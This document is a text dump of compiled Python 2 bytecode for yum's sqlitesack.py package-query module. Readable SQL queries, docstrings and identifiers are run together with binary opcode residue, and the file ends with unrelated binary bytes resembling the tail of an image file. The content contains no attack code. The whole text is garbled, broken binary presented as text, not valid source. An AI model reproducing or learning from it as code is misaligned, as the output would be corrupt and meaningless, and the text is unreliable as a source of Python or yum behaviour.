d|nti|S(NsYselect pkgId,pkgKey,name,epoch,version,release,arch from packages where name=? and arch=?R6sNo Package Matching %s.%s(
RRtreturnNewestByNameArchRRRlRR7R$RRRtnewestInList(R]tnaTuptpatternstignore_casetallpkgRBRoR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRscCs|iogS|ptii||||Sg}xU|iiD]D\}}|i}t|d|f|i|||dt	qIW|pt
id|nti
|S(sBreturn list of newest packages based on name matching
           this means(in name.arch form): foo.i386 and foo.noarch will
           be compared to each other for highest version.
           Note that given: foo-1.i386; foo-2.i386 and foo-3.x86_64
           The last _two_ pkgs will be returned, not just one of them. sNselect pkgId,pkgKey,name,epoch,version,release,arch from packages where name=?R6sNo Package Matching %s(R9RRtreturnNewestByNameRRRlRR7R$RRRR(R]RYRRRRBRoR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRs	
cCsD|iogggfSg}g}t|}x|D]}ti|o"thdd6|d6}|}nthdd6|d6}|}xs|iiD]b\}}	|	i}
t|
||i	||
}t
|o|i|n|i|qWq:Wti
|}ti
|}ti
|}|||fS(NR:toptqR;(R9RRRtPARSE_QUERYRRRlRR7RtremoveRR?(R]tpkgspecstmatchedt
exactmatcht	unmatchedtptquerytmatchresRBRjR?tpmatches((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytmatchPackageNamess0



c
Csp|d
jo
g}ndddddddg}t}x@|D]8}ti|o"|p||ijot}Pq?q?Wti}|pdg}ti}nt	||jo
g}n|ot
|}ng}t}	xN|D]F}ti|o|i|dft}	q|i|d	fqW|o |	o|o|||tfS|}|||tfS(szSetup need_full and patterns for _yieldSQLDataList, also see if
           we can get away with just using searchNames(). RYtsql_nameArchtsql_nameVerRelArchtsql_nameVertsql_nameVerRelt	sql_envrat	sql_nevraR:R;N(
R<R%Rtre_full_search_neededRR$RdReRRRRR(
R]RMRRR^t	need_fulltpattpat_maxRt	need_glob((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_setupPkgObjLists@

				


ccsNg}g}x|D]\}}|o||ijoqnxT|D]L}	|o|id|	|fn|id|	|f|i|qEWqW|o
|odS|otdi|}
nd}
xv|iiD]e\}}|djp||ijo<|i}
t	|
|
|x|
D]}||fVq-WqqWdS(s^Yields all the package data for the given params. Excludes are done
           at this stage. s%s LIKE ?%ss%s %s ?Ns OR sYselect pkgId, pkgKey, name,epoch,version,release,arch
                      from packages(
RRt_FULL_PARSE_QUERY_BEGRiRRR<RLRlR(R]RMRR^RRtpat_dataRYtrestR@RRNRoR?R((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_yieldSQLDataList6s2c	Csg}|i|||}|\}}}}|o|i|Sx`|i||||D]F\}	}
|i|	|
d|
}|djoq[n|i|q[W|o&|djo||_t|_n|o?|djo2|ii	g}|D]}||i
q~n|ohxe|D]Y\}
}|djoq(nx6|D].}|i
|
jo|ii|i
PqOqOWq(Wn|p+x(|D]\}
}|ii|
qWn|S(sjBuilds a list of packages, only containing nevra information.
           Excludes are done at this stage. RcR;RN(R;R(
RRRR$R<RRR0RRRYRR(R]RMRRRR1RR^RRNRRRRRR*((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt_buildPkgObjListWs@
	2
cCs|iogSt|d}|o|i}n%|i|||}t|d}|o<|o5t}t|||dd}|d|d}n|djo|o|}n|Sg}x2|D]*}||ijoqn|i|qW|S(sReturns a list of packages, only containing nevra information. The
           packages are processed for excludes. Note that the packages are
           always filtered to those matching the patterns/case. RR?srepo-pkgkeyiiN(	R9RRRR%RR<RMR(R]RMRRtinternal_pkgoblistRRR((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytreturnPackages}s.
	
cCs|iogSt|d}|otii|||Sd}g}|i|||}|\}}}}	|	o,g}
|i|D]}|
|iq~
Sx`|i	||||D]F\}}
|i
||
d|
}|djoqn|i|qW|S(sReturns a list of pkg tuples (n, a, e, v, r), optionally from a
           single repoid. Note that the packages are always filtered to those
           matching the patterns/case. RRcN(R9RRRt
simplePkgListR<RRR9RR&R(R]RRRRMRR1RR^RRR*RNRR9((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRs(
,
c
Cs|iogSg}|ox|id|gD]}t}x`d|fd|fd|fd|fgD]4\}	}
|
o!t||	|
jot}PqlqlW|o|i|q5q5W|St}x.|||||fD]}|o
t}qqW|o|Sd}
xd|fd|fd|fd|fd|fgD]T\}	}
|
oA|
dd	jo|
d
|	|
f}
q|
d|	|
f}
qBqBWxO|iiD]>\}}|i}t	||
|i
|||dtqW|S(
s6return list of pkgobjects matching the nevra requestedRRSRURZRWsGselect pkgId,pkgKey,name,epoch,version,release,arch from packages WHERERYitWHEREs AND %s = "%s"s
 %s = "%s"R6(R9RR$RkR%RRRRlRR7(R]RYRSRVRXRZRR*R&tcoltvartemptytargRRBRoR?((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytsearchNevrasJ
	
c	Cs
|idjot||_n|ii||_td|}di|}x|iiD]\}}|i}|i	i
dpd|ijoqint}t|dx*|D]"}|d|jot
}PqqW|p|i|dSqiWdS(sBexcludes incompatible arches - archlist is a list of compat archescSsd|S(s'%s'((R((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRbst,s-sourcetsrcs"SELECT DISTINCT arch FROM packagesiN(RR<R0tintersectionRRiRRRlRLRR%RR$R
(	R]tarchlistt	sarchlistt
arch_queryRBRoR?thas_archtrow((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytexcludeArchss($
	
N(NNN(NNN(@RRRR_RRpRRRRRRRRR	R
RRRRRRRR$R#R$R&R+R<R0R4R%R7R9RCRDRFR[R`RrR{R|RRRRRRR2RRRRRRRRRRRRRRR(((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRs											
				A				)		
			~4%[;A					'!&#,cCs
di|S(NR(Ri(tfilenamelist((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytencodefilenamelistscCs|idd}|idS(Ns//R(R]R(tfilenamestring((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRscCsDd}hdd6dd6dd6}x|D]}|||7}q(W|S(NRRIRtdtdirtgtghost((tfiletypelistRt	ft2stringR((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pytencodefiletypelistscCs>hdd6dd6dd6}g}|D]}|||q&~S(NRRIRRRR((tfiletypestringt	string2ftRR((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyRss
select pkgKey from packages
where name %(op)s '%(q)s'
   or name || '.' || arch %(op)s '%(q)s'
   or name || '-' || version %(op)s '%(q)s'
   or name || '-' || version || '-' || release %(op)s '%(q)s'
   or name || '-' || version || '-' || release || '.' || arch %(op)s '%(q)s'
   or epoch || ':' || name || '-' || version || '-' || release || '.' || arch %(op)s '%(q)s'
   or name || '-' || epoch || ':' || version || '-' || release || '.' || arch %(op)s '%(q)s'
s
SELECT pkgId,pkgKey,name,epoch,version,release,arch,
  name || "." || arch AS sql_nameArch,
  name || "-" || version || "-" || release || "." || arch AS sql_nameVerRelArch,
  name || "-" || version AS sql_nameVer,
  name || "-" || version || "-" || release AS sql_nameVerRel,
  epoch || ":" || name || "-" || version || "-" || release || "." || arch AS sql_envra,
  name || "-" || epoch || ":" || version || "-" || release || "." || arch AS sql_nevra
  FROM packages
  WHERE
(*R<tos.pathRRtpackagesRRRRRRRRRRtrpmUtils.miscutilsRRdRgtyum.miscRtyum.i18nRR	RRRRR!R)R6R>RCRDRRRRRRRR(((s2/usr/lib/python2.6/site-packages/yum/sqlitesack.pyt<module>sF"					C	S					
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`